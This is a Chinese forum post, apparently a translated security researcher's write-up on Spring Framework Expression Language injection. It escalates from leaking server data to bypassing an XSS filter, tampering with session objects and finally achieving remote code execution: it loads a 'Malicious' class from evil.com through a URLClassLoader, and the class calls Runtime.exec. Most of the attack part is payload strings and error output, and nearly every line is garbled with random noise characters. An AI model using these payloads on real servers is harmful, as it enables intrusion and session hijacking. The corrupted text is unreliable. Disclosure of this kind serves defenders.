Remote Code with: k5 \1 v; E$ y! v t& Z
Expression Language Injection5 D0 h3 G( P9 }& \3 }4 A* k6 A1 X5 P
Spring Framework脆弱性—DanAmodio4 `, d* D" k0 b4 t- z
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
+ Y) a% m- i# ?9 v' [9 S3 H! c: F可能会存在风险。
- h& N. t2 P5 l, K4 O在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的0 f+ X& q7 g$ X" w
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可
& w& M t; k. T! \% y以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
: C- x" Q* J; ~1 | r2 l以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
/ I, ?. c5 x, I版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。1 j/ a, d( T7 R7 q" g+ D9 z" y
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
7 i9 ?1 a5 d0 W' p1 }( { z我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
v; c* H, {( E E本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
! }, [2 q# T0 n/ m( m; E这些版本不支持禁用double EL resolution.4 h5 X5 R. c* j3 W
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含% E1 U, T2 ^8 w! B# z$ P" @& v
EL2.2容器上可能进行远程代码执行。5 ~# z& ~7 b2 {6 d
这是一个原始信息泄露的攻击例子: ]; t1 V0 T3 R
请求:' T ?+ q$ Y- H& y& C- E5 _1 z( f! k
ttp://vulnerable.com/foo?message=${applicationScope}" N6 v- |5 p1 n' `
到达以下内容页面:
0 N% r: O/ U" t$ V& s2 D9 o结果将输出一些包含内部服务器信息calsspath 和本地工作目录
8 N4 Z" u" t" c. s; ~) d, P* P3 ~! I2 k你也可以做一些其他事情,如这样:/ W9 e: o4 C: O* |( X
${9999+1}7 [- v7 {4 d- k: W' p. U
还可以访问session 对象和beans2 \$ I5 L. o/ ^1 ]
${employee.lastName}6 i! s* }9 l: w! F" A, t3 C
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是2 A. x; @8 [' l1 B
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
0 Z" b' M4 ?. ^西,比如XSS.
7 j7 G- {* d' Q$ O- H: {哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签; M) W0 T5 K. d
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤 a* g( x6 F1 Z$ e& x
呢?”+ u( V! u& _+ h6 s6 P* \
因此,我尝试巳缦拢�3 |) ]% J* U' P1 W( j: X5 ]3 Q( Y. d
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
- j4 R- r- N/ E3 [' s" f( A$ XP& n0 s5 R9 w" a
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返: G+ h6 W. ~& P4 B- b+ F3 j' n: Y" S
回的文本被插入进了spring:message 标签。
, f' j6 b0 ~$ e5 T$ V这里是一个最终绕过过滤的实例:' _! H5 J: I0 \: w8 G" w
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
( u. ~& a( I* @它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为 L2 v z( y) z+ A! S
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
! b" `# D8 t# b0 G0 Y! v7 F经过一番研究,我学习到EL2.2 增加了方法调用。) @7 F# O4 B3 d" f2 s' o8 O8 g% F, V
我写了一个快速测试应用程序代码并且检测一些功能
+ j3 U3 Q. G- a3 K* P2 V${pageContext.request.getSession().setAttribute(“account”,”123456″)}
* k: a$ H2 e2 k${pageContext.request.getSession().setAttribute(“admin”,true)}0 J! a$ b5 H9 ~2 d( k+ i
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的9 p3 |& R% K7 D' Q) ^$ ]
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?2 i5 Q. k2 u7 X1 z4 p( t( }
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1% V E7 r# ]' H8 t
“, 1234)}
9 S" M! l" z( J- P0 Q1 d6 y6 s5 Z${“”.getClass().forName(“java.lang.Runtime”)}
& b; t) u5 ~/ x7 V! T( j哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不1 A) q6 e. [ a ?, V
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函) `7 J+ M, [4 n( U% Q8 F3 ~8 n' W3 Z
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
$ f) C+ O( X8 I! E9 N, e( j: k5 F一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于" M; ?5 `! h& c: i: ^3 O ]+ K7 I
方法签名invoke(Object obj, Object„ args)' G% N! j* l0 C
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问& ]) l1 E0 U3 r' m0 I
题,以让它可以工作起来。& C- d: N* {8 i- w) R
漏洞利用:* T7 x" g; z" r5 m
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我
$ l) \( E$ A& s( X0 H希望你们中的一些JAVA奇才告诉我我是如此的可笑。
! w- ]1 c; o0 f4 e& F' B这里有一些我试过的失败的用例,为了试图让它工作的用例:* o$ {: F i: _9 j0 d' ~6 D
写文件到文件系统, M G: w* e: @
试图载入org.springframework.expression.spel.standard.SpelExpressionParser./ J6 |2 L: s A1 |% H
我认为这些可以很好的工作,但是我不能找到合适的类来载入。 `4 Q# V. e' t1 Z; F$ g$ r8 E
${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
q5 L) u- M$ p, Cjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
5 B; z0 H3 r& v+ z: m9 f2 Borg.springframework.expression.spel.standard.SpelExpressionParser not found. R. w K0 {3 @
by
, w7 h) E* P4 Q! Norg.glassfish.web.javax.servlet.jsp [194].
0 B, l" B3 N$ M4 e2 E 利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
) r( M6 U' U0 T' f+ G# H1 ` 利用反射来创建一个新的Runtime(and watch the world burn)
2 |( N& x! _" Y${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName& D& ?' z$ h% f
(“java.lang.Runtime”)).getDeclaredConstructors()[0])}) p( R3 W8 v, |" I; }, g/ p5 W
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
r5 v, e% g7 D/ H6 Z5 T 使用java.lang.ProcessBuilder$ s- p( L2 T' ?8 R6 N: t. X& b
用表达式语言来评估表达式语言% M/ u/ h! i4 O% U) Z
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.$ Z3 o- O/ r' c# |& C
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request( ?( W' R: b: e3 x) w% G* M$ Z& i
“,”".getClass(),null)}: ~5 h4 |2 C, h! c5 Q A- a
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
* G- ?5 q; X+ M% o我在使用一个空数组通过Method.invoke()时失败了很多次
d0 L" g) f( V- a7 n0 f0 x4 c“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo3 V- H& Y% b) u. G
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A0 E2 a* e# n9 X+ S
rrayList”).newInstance().toArray())
6 `" Z5 \& r" g+ _( jjava.lang.IllegalArgumentException: wrong number of arguments& M; ~% u9 E" B+ {- e4 H( a& p/ ?
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可% N9 I5 M* m8 ^" V6 {% N( X- `
以创建一个恶意class文件并且指向类装载器.* C, I: Z6 ?8 v
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:# s: B' Y1 p# s) F7 |0 ?- P
public class Malicious {
- q% _- W" w3 a! ]9 b- H0 Wpublic Malicious() {
7 Z/ X$ \% ?: w) P/ I3 atry {0 [* T b* g, j |- @8 B8 p
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac$ ^& Y7 O9 Y: I) d
java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
+ b6 k {1 w& }, H} catch (Exception e) {
- U: t) \. z( E# g7 t}: t S( T( g9 e+ l" n
}
5 N3 [' |% A8 J; d* D+ V我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
4 A- s) G8 }! H3 I0 m! ~5 h- L3 u* ~话中,因此它可以被使用.) G; h2 h }1 r4 }+ q
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName5 ^0 P8 R U# f6 z: [+ Q- Z
(“java.util.ArrayList”).newInstance())}
. v+ N/ Q: ]/ ^URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
/ y% }9 z' v( `2 H& e' S) r一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
8 |, U* l% k% W9 N" [& V, |# |; u, C% [getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个: `) i) Y7 Z7 I
我们可以调用的create(string)方法,然后转换对一个URL对象。
+ }1 \, M1 F9 `, s${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
9 X% ^2 U/ L- w% Aere/malicious/classfile/is/located/”).toURL())}8 Z, `& }# n6 F: ~4 `8 p9 O
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,' N+ v! f# U- U' x9 ^
恶意类文件被装载并创建,触发远程代码.
# ~* d5 p* N) r6 O0 i& N) m${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte, }8 t1 y8 Q( G: B( E
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
1 G# ]0 a' D6 ]% z/ [' WgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance6 ]/ ~! A) B4 i) ~' f, j
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对